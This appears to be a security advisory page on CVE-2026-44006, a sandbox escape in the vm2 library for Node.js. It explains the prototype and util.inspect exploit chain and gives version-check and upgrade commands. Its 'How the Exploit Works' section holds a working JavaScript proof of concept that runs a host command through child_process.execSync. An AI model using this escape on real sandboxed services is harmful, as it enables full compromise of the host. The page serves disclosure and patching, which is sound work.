The vulnerability (CVE-2026-44006) allows malicious code to escape the sandbox and execute arbitrary commands on the host system. It is a code injection flaw that abuses the `BaseHandler.getPrototypeOf` mechanism.
Root Cause: The `BaseHandler` class in vm2’s `bridge.js` handles prototype operations. Attackers can reach `BaseHandler.getPrototypeOf` via Node.js’s `util.inspect` function, which can expose internal handler state.
Exploit Chain: By creating a specially crafted object with a custom `inspect` function, an attacker can force the `inspect` function to leak a reference to a host object. This can be achieved by manipulating the `stylize` function within `util.inspect` options, where the handler’s `getPrototypeOf` method becomes accessible.
PoC Mechanism: The PoC manipulates an object’s prototype chain (`Buffer.prototype`) to gain access to the host `Object` constructor and its symbols. Using `Object.getOwnPropertySymbols`, the attacker obtains `Symbol(nodejs.util.inspect.custom)`.
Symbol Abuse: Once the internal symbol is obtained, the attacker defines a malicious function for it. This function is invoked when Node.js uses `util.inspect` internally, providing a direct bridge to the host environment.
WebAssembly as a Vector: The attacker triggers this payload via `WebAssembly.compileStreaming(obj)`. The `ERR_INVALID_ARG_TYPE` error generated by `WebAssembly.compileStreaming()` internally triggers `util.inspect`, which activates the malicious custom inspect function.
Code Execution: The malicious function inside the `inspect` callback then has access to the host’s `Function` constructor. It can spawn a child process using `child_process.execSync` (or a similar pattern), performing a sandbox breakout that leads to Remote Code Execution (RCE).
Context: This vulnerability affects the `patriksimek/vm2` product and is a critical sandbox escape.
dailycve form
Platform: `Node.js/vm2`
Version: `<= 3.10.5`
Vulnerability: `Sandbox Escape RCE`
Severity: `Critical`
Date: `2026-05-07`
Prediction: `Released in 3.11.0`
What Undercode Say
The `CVE-2026-44006` flaw highlights a significant failure in vm2’s isolation logic, specifically in how it handles JavaScript prototypes and host exceptions when processed by Node.js’s internal functions.
Checking whether the installed vm2 is in the affected range, then patching it:

```bash
# Print the installed vm2 version; the regex only matches 3.0.0 through 3.10.x
# (the original pattern matched every 3.x release, including the fixed 3.11.0).
# A 3.10.x hit is affected only if it is <= 3.10.5.
grep '"version":' node_modules/vm2/package.json | grep -E '"3\.([0-9]|10)\.[0-9]+"'
# Or ask npm for the resolved version of vm2 in this project
npm list vm2
# Patch: upgrade to the fixed release
npm install vm2@3.11.0
```
How the Exploit Works
The exploit leverages the `util.inspect` mechanism and WebAssembly compilation to breach isolation.
```javascript
// Malicious object to trigger the vulnerability
let obj = {
  // Custom inspect hook: Node.js calls this when util.inspect formats the object
  [Symbol.for('nodejs.util.inspect.custom')]: (depth, opt, inspect) => {
    // `inspect` is a host function, so its constructor is the host Function
    inspect.constructor("return process.getBuiltinModule('child_process').execSync('id',{stdio:'inherit'})")();
  },
  valueOf: undefined,
  constructor: undefined,
};
// compileStreaming rejects with ERR_INVALID_ARG_TYPE; formatting that error
// runs util.inspect on `obj`, which fires the hook above
WebAssembly.compileStreaming(obj).catch(() => {});
```
Protection from this CVE
Immediate remediation is required for all environments running untrusted code within a vm2 sandbox.
Upgrade Immediately: Update the vm2 library to version `3.11.0` or later. This version disables the vulnerable prototype exposure.
Input Validation: While not a complete solution, strictly validate any untrusted data entering `WebAssembly.compileStreaming` or `util.inspect` contexts.
Impact
Unpatched versions of the vm2 library (including versions through 3.10.5) are critically at risk.
Sandbox Breakout: Attackers can completely bypass the vm2 sandbox.
Full System Compromise: Successful exploitation provides attackers with the same permissions as the Node.js process, leading to Remote Code Execution (RCE) and full system compromise.
Sources:
Reported By: github.com